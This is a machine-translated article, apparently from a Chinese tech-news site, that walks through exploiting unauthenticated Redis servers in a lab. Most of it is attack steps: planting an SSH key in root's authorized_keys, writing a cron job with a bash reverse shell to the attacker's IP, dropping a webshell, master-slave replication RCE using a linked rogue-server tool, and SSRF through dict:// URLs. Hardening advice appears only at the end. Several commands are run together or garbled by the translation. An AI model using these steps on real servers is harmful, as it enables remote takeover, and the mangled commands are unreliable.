Shulou(Shulou.com)05/31 Report--

This article mainly shows you "what are Redis loopholes", the content is easy to understand, clear, hope to help you solve your doubts, the following let the editor lead you to study and learn "what are Redis loopholes" this article.

About Redis redis is a key-value storage system. Similar to Memcached, it supports relatively more value types of storage, including string, list, set, zset, and hash. These data types support push/pop, add/remove, and take intersection union and difference sets, and richer operations, and these operations are atomic. On this basis, redis supports a variety of different sorting methods. Like memcached, data is cached in memory for the sake of efficiency. The difference is that redis will periodically write updated data to disk or modify operations to additional record files, and on this basis to achieve master-slave (master-slave) synchronization. Redis common command: set xz "Hacker" # set the value of the key xz to the string Hacker get xz # get the content of the key xz SET score 857 # set the value of the key score to 857 INCR score # use the INCR command to increase the value of score 1 GET score # get the contents of the key score keys * # list all the keys in the current database config set protected-mode no # turn off the safe mode get anotherkey # get the value of a non-existent key config set dir / root/ Redis # set save directory config set dbfilename redis.rdb # set save file name config get dir # view save directory config get dbfilename # view save file name save # make a backup operation flushall # Delete all data del key # Delete the data slaveof ip port whose key is key # set the master-slave relationship redis-cli-h ip-p 6379-a passwd # basic operation of external connection Redis 1. Using SET and GET commands, you can complete basic assignment and value operations; 2.Redis is not case-sensitive, set and SET have the same meaning; 3. Use keys * to list all the keys in the current database; 4. When trying to get the value of a key that does not exist, Redis returns null, that is, (nil); 5. If there is a space in the value of the key, you need to enclose it in double quotation marks, such as "Hello World"; Redis profile parameter:

Port parameter

The format is port followed by the port number, such as port 6379, which means that the Redis server will listen on port 6379 to wait for the client to connect.

Bind parameter

The format is bind followed by IP address, which can be bound to multiple IP addresses at the same time. The IP addresses are separated by spaces, such as bind 192.168.1.100 10.0.0.1, and the table allows 192.168.1.100 and 10.0.0.1 IP connections. If set to 0.0.0.0, it means that any ip can be connected. To put it bluntly, it is a whitelist.

Save parameter

The format is save, which means that the backup is performed automatically when there are a specified number of changes in the database within a specified number of seconds (Redis is an in-memory database, where backup refers to backing up the data in memory to disk). Multiple save parameters can be specified at the same time. For example, save 9001save 300 10save 60 10000 means that if the content of the database changes 10000 times after 60 seconds, or 10 times after 300 seconds, or once after 900 seconds, then the backup operation will be performed immediately.

Requirepass parameter

The format is requirepass followed by the specified password, which specifies the password that the client uses when connecting to the Redis server. The default password parameter for Redis is empty, indicating that no password is required to connect; at the same time, the configuration file has a commented requirepass foobared command, which, if uncommented, means that a foobared password is required to connect to the Redis database.

Dir parameter

The format is dir followed by the specified path, and the default is dir. /, indicating that the working directory of Redis is the current directory, that is, the directory where the redis-server file is located. Note that the backup files generated by Redis will be placed in this directory.

Dbfilename parameter

The format is dbfilename followed by the specified file name, which is used to specify the name of the Redis backup file. The default is dbfilename dump.rdb, that is, the name of the backup file is dump.rdb.

Config command

The dir parameter and the dbfilename parameter can be read and set through the config command, because this command is dangerous (described in more detail in the lab), so Redis provides the rename-command parameter in the configuration file to rename it, such as rename-command CONFIG HTCMD, and you can rename the CONFIG command to HTCMD. The configuration file does not rename the CONFIG command by default.

Protected-mode parameter

After redis3.2, the protected-mode security mode is added. The default is yes. External connections are prohibited when enabled, so when testing, change it to no in the configuration first. Test environment attack machine Kali (192.168.33.131) target machine Ubantu 16 (192.168.33.133) vulnerability exploitation

Use the principle:

Redis provides two different persistence methods, RDB and AOF.

RDB persistence can generate a point-in-time snapshot of a dataset within a specified time interval

AOF persistence records all write commands executed by the server.

After checking the documents on the official website, it is found that the file name of the database backed up by AOF is appendonly.aof by default. You can set other names through appendfilename in the configuration file. Through testing, it is found that appendfilename cannot be dynamically set in the client interaction, so you cannot back up and write any files by AOF.

The file name of the backup database in RDB mode defaults to dump.rdb, which can be changed by dynamically setting dbfilename in the client, so that any file can be written.

Environment building:

Target aircraft: unbantu 16

For quick reproduction, the default apt-get installation first updates the sudo apt-get upgrade installation. By default, sudo apt-get install redis-server is installed to / usr/bin/redis-server to directly start the service to execute redis-server or redis-server+ (configuration file directory) Note to change the bind parameter in the configuration file to 0.0.0.0 or comment out, and change the protected-mode to no to allow external connections. Also need to turn off the firewall, specific command: sudo ufw disable view firewall status: sudo ufw status

Open the redis service after installation to prepare for reproduction

Use mode 1. Log in to the server by writing ssh-keygen public key

Principle:

SSH provides two login authentication methods, one is password authentication, that is, account password login, and the other is key authentication.

The so-called key verification is actually a kind of authentication based on public key cryptography, which uses public key encryption and private key decryption, in which the public key can be made public. On the server side, you can put the same public key on all servers where you want to log in to SSH remotely, while the private key is secret. Only you know that the message encrypted by public key can only be decrypted by private key. The general process is as follows:

(1) the client generates the private key and the public key and copies the public key to the server; (2) the client initiates a login request and sends its own relevant information; (3) the server finds whether the client's public key exists according to the information sent by the client. If there is no login, a random number is generated and encrypted with the public key and sent to the client. (4) after receiving the encrypted message from the server, the client decrypts the encrypted message using the private key and sends the decrypted result to the server for verification; (5) the server receives the decryption result from the client and compares it with the random number it has just generated. if it is the same, login is allowed, but if it is not the same, login is refused.

Conditions:

1. Redis service is started with ROOT account.

2. The server opens the SSH service, and allows you to log in with a key, so you can write a public key remotely and log in to the remote server directly.

Detailed steps:

Generate a public key file locally on the attack plane:

We need to set a private key for our public key file

Default path of public key file: / root/.ssh/id_rsa.pub

Specific commands:

Ssh-keygen-t rsacd / root/.sshlscat id_rsa.pub

Then access the target machine through unauthorized access

Specific command

Redis-cli-h 192.168.33.134 # Connect to target host redisconfig get dir # check current save path config get dbfilename # check save file name config set dir / root/.ssh/ # set save path config set dbfilename authorized_keys # set save file name set xz "\ n\ n\ n public key\ n\ n\ n" # write the public key to xz key save # to save it

Using the public key to log in to the attack machine with SSH, you need to enter yes for the first time

2. Use scheduled tasks to rebound shell

Principle:

We all know that crontab does the scheduled task, and the started task is stored in / var/spool/cron. Root can modify the scheduled task and write the execution command bounce shell directly to the scheduled task.

Conditions:

Root enables Redis

Redis has no password or weak password

Detailed steps:

First use nc to listen to port 8888 nc lvp 8888 on the attack plane.

Then operate the Redis with the specific command:

Redis-cli-h 192.168.33.134 # connection redisflushall # clear all key values config set dir / var/spool/cron/crontabs/ # set save path config set dbfilename shell # save name set xz "\ n * bash-I > & / dev/tcp/192.168.33.131/8888 0 > & 1\ n" # write the bouncing shell to the xz key value save # write to the shell file of the save path

You can see that there is already a shell bouncing back in the listening command line window (there are many holes here, and there will be garbled code and no bounce in ubantu writing. It is best to use centos test for bounce shell test)

Ubantu's pit refer to this article https://www.dazhuanlan.com/2019/11/15/5dce507a41df5/

3. Redis writes webshell directly.

Conditions:

Know the absolute path of the website, and need to add, delete, change and search permissions.

Root starts redis

Redis weak password or no password

Add: if you don't know the physical path, try to find the site's application error or common absolute path to try.

Detailed steps:

Redis-cli-h 192.168.3.134 # Connect Redisconfig set dir / www/admin/localhost_80/wwwroot # set the path to write shell set xxx "\ n\ n" # write phpinfo () to xxx key config set dbfilename phpinfo.php save

Write successfully

4. Redis master-slave copy getshell

Principle:

Redis if the data is stored in a single instance of Redis, when the volume of reading and writing is relatively large, it is very difficult for the server to bear. In order to deal with this situation, Redis provides master-slave mode. Master-slave mode refers to the use of a redis instance as the host and other instances as the backup machine, in which the master and slave data are the same, while the slave is only responsible for reading and writing. The separation of read and write can greatly reduce the pressure on traffic, which can be regarded as a way of mitigation by sacrificing space for efficiency.

When two Redis instances set the master-slave mode, the host instance of Redis can synchronize the file to the slave through FULLRESYNC, and then load the so file on the slave, and we can execute the new extended command.

Conditions:

Redis version (4.x~5.0.5) (new module function, can be compiled in C language and malicious .so files)

Redis weak password or no password

Root starts redis

Detailed steps:

Simulate the master-slave relationship, specific commands

Root@kali:~/ Desktop # redis-cli-h 192.168.33.134192.168.33.1346379OK192.168.33.134:6379 > slaveof 192.168.33.131 6379OK192.168.33.134:6379 > get xz (nil) 192.168.33.1346379OK192.168.33.134:6379 6379 > exitroot@kali:~/ Desktop # redis-cli127.0.0.1:6379 > get xz (nil) 127.0.0.1 slaveof > set xz xzOK127.0.0.1:6379 > exitroot@kali:~/ Desktop # redis-cli-h 192 .168.33.134192.168.33.134: 6379 > get xz "xz" 192.168.33.134 > 6379 >

Set up master-slave relationship

Root@kali:~/ Desktop # redis-cli-h 192.168.33.134192.168.33.1346379OK 6379 > slaveof 192.168.33.131 6379OK

Then download the utility https://github.com/n0b0dyCN/redis-rogue-server at kali

After downloading, cd goes to the RedisModulesSDK directory and compiles with make. Of course, if you don't want to compile, you can also use the default exp.so given by the author.

There are two ways to use it.

One is interactive shell, the other is bouncing shell.

Interactive shell demo:

Python3 redis-rogue-server.py-- rhost 192.168.33.134-- lhost 192.168.33.131-- exp module.so enter I to enter the interactive shell as prompted

Rebound shell

Python3 redis-rogue-server.py-- rhost 192.168.33.134-- lhost 192.168.33.131-- exp module.so enter r as prompted, then enter ip and port to bounce

If the ps:redis master and slave RCE play too much, redis will be paralyzed, so try not to hit the master and slave unless you have to.

5. Make use of SSRF.

Principle:

The target of the SSRF attack is an internal system that is inaccessible from the external network, where the local Redis is accessed through SSRF using the dict protocol.

Conditions:

Root enables redis

Dict protocol exists in the target machine

Know the absolute path of the website

Redis has no password or weak password

Detailed steps:

If pikachu is used in the shooting range, dict protocol is used here. The target machine needs to install dict protocol first.

Writing directly here will be encoded by the entity,? It is truncated directly. No solution has been found for the time being. Dict://192.168.33.134:6379/set:xz: dict://192.168.33.134:6379/config:set:dir:/www/admin/localhost_80/wwwroot dict://192.168.33.134:6379/config:set:dbfilename:ssrf.phpdict://192.168.33.134:6379/save failed to write directly Therefore, you can use master-slave replication to write to dict://192.168.33.134:6379/slaveof:192.168.33.131:6379 dict://192.168.33.134:6379/config:set:dir:/www/admin/localhost_80/wwwrootdict://192.168.33.134:6379/config:set:dbfilename:ssrf.php, first set the saved path and file name, and then log in to kali for master-slave replication. The method is the same as the above 127.0.0.1 dict://192.168.33.134:6379/save 6379 > set xxx "\ n\ n" and then perform the save operation dict://192.168.33.134:6379/save on the web side so that the data is synchronized directly to the target machine.

Screenshot of write failure:

The screenshot was written successfully:

6. Redis writes lua

Redis2.6 built-in lua scripting environment can use lua to execute system commands without redis authorization. There is no in-depth study here. If you are interested, you can read this article: https://wooyun.x10sec.org/static/drops/papers-3062.html

Batch detection of unauthorized redis scripts

Https://github.com/Ridter/hackredis

Emergency response cases for unauthorized vulnerabilities in redis:

Redis unauthorized access leads to remote implant mining script (defense)

Https://mp.weixin.qq.com/s/eUTZsGUGSO0AeBUaxq4Q2w

Take advantage of expansion:

How to getshell under Windows?

To write webshell, you need to know the web path to write the startup item, and the target server needs to restart the write MOF,MOF to be executed automatically every 5 seconds, which is suitable for Windows2003. Repair scheme:

1. Prohibit some high-risk commands (restart redis to take effect)

Modify redis.conf file, disable remote modification of DB file address

Rename-command FLUSHALL "" rename-command CONFIG "" rename-command EVAL ""

Or change the names of these high-risk commands by modifying the redis.conf file

Rename-command FLUSHALL "name1" rename-command CONFIG "name2" rename-command EVAL "name3"

2. Run the Redis service with low privileges (restart redis to take effect)

Create separate user and home directories for the Redis service, and configure no login

Groupadd-r redis & & useradd-r-g redis redis

3. Add password authentication for Redis (restart redis to take effect)

Modify redis.conf file, add

Requirepass mypassword (note that redis does not use the-a parameter, enter the password in clear text, and use auth authentication after connection)

4. Prohibit public network access to Redis (restart redis to take effect)

Modify the redis.conf file, add or modify it so that the Redis service is only available on the current host

Bind 127.0.0.1

After redis3.2, redis adds protected-mode, in which an error is reported when unbound IP or password access is not configured.

5. Modify the default port

Modify configuration file redis.conf file

Port 6379

The default port is 6379, which can be changed to another port (just don't conflict)

6. Ensure the security of authorized_keys files

To ensure security, you should prevent other users from adding new public keys.

Set the permissions of authorized_keys to read-only to the owner, and other users do not have any permissions:

Chmod 400 ~ / .ssh/authorized_keys

To ensure that the permissions of authorized_keys will not be changed, you also need to set the immutable bit permissions of the file:

Chattr + I ~ / .ssh/authorized_keys

However, users can also rename ~ / .ssh and create a new ~ / .ssh directory and authorized_keys file. To avoid this, you need to set the immutable permission of ~. / ssh:

Chattr + I ~ / .ssh

7. Set firewall policy

If the Redis service needs to be accessed by other servers in normal business, you can set the iptables policy to allow only the specified IP to access the Redis service.

The above is all the contents of this article "what are the Redis loopholes?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.